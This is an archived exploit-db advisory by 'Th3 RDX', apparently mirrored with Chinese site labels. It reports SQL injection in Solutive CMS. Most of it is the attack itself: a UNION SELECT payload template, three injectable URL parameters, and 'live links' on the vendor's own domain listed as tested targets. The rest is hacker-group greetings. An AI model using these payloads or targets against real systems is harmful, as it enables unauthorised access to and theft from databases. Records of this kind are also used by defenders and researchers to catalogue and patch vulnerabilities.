Solutive CMS – SQL Injection

  • 作者: Th3 RDX
    日期: 2010-04-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12041/
  • -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to ### www.Teamicw.in | www.IndiShell.in | www.AndhraHackers.com ###
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 L0v3 T0 : "R00T", "R45c4l" & "Agent: 1c3c0ld"
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

Th3 RDX

----- [ E - mail ] -----

 th3rdx@gmail.com


%\\
##############################################################################

##############################################################################
%//

----- [Title] -----

Solutive CMS SQL Injection Vulnerability

----- [ Vendor ] -----

創造有影響力的數碼體驗

%\\
##############################################################################

##############################################################################
%//

----- [ Exploit (s) ] -----

Put [CODE] = SQL Injection Code

{e.g = product_detail.php?id=7+and+1=0+ Union Select1 ,2,
UNHEX(HEX([visible]))
,4,5,6 (tables & column) }

[SQLi] http://server/cms/product_detail.php?id=7[CODE]

[SQLi] http://server/cms/news_content.php?id=9[CODE]

[SQLi] http://server/cms/products_by_cat.php?Cat_id=1[CODE]


%\\
##############################################################################

##############################################################################
%//

>>>>>> TESTED ON <<<<<<

----- [ Live Link (s) ] -----

[Link] http://solutive.net/cms01/product_detail.php?id=7[CODE]

[Link] http://solutive.net/cms01/news_content.php?id=9[CODE]

[Link] http://solutive.net/cms01/products_by_cat.php?Cat_id=1[CODE]

%\\
##############################################################################


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 04 April 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    Python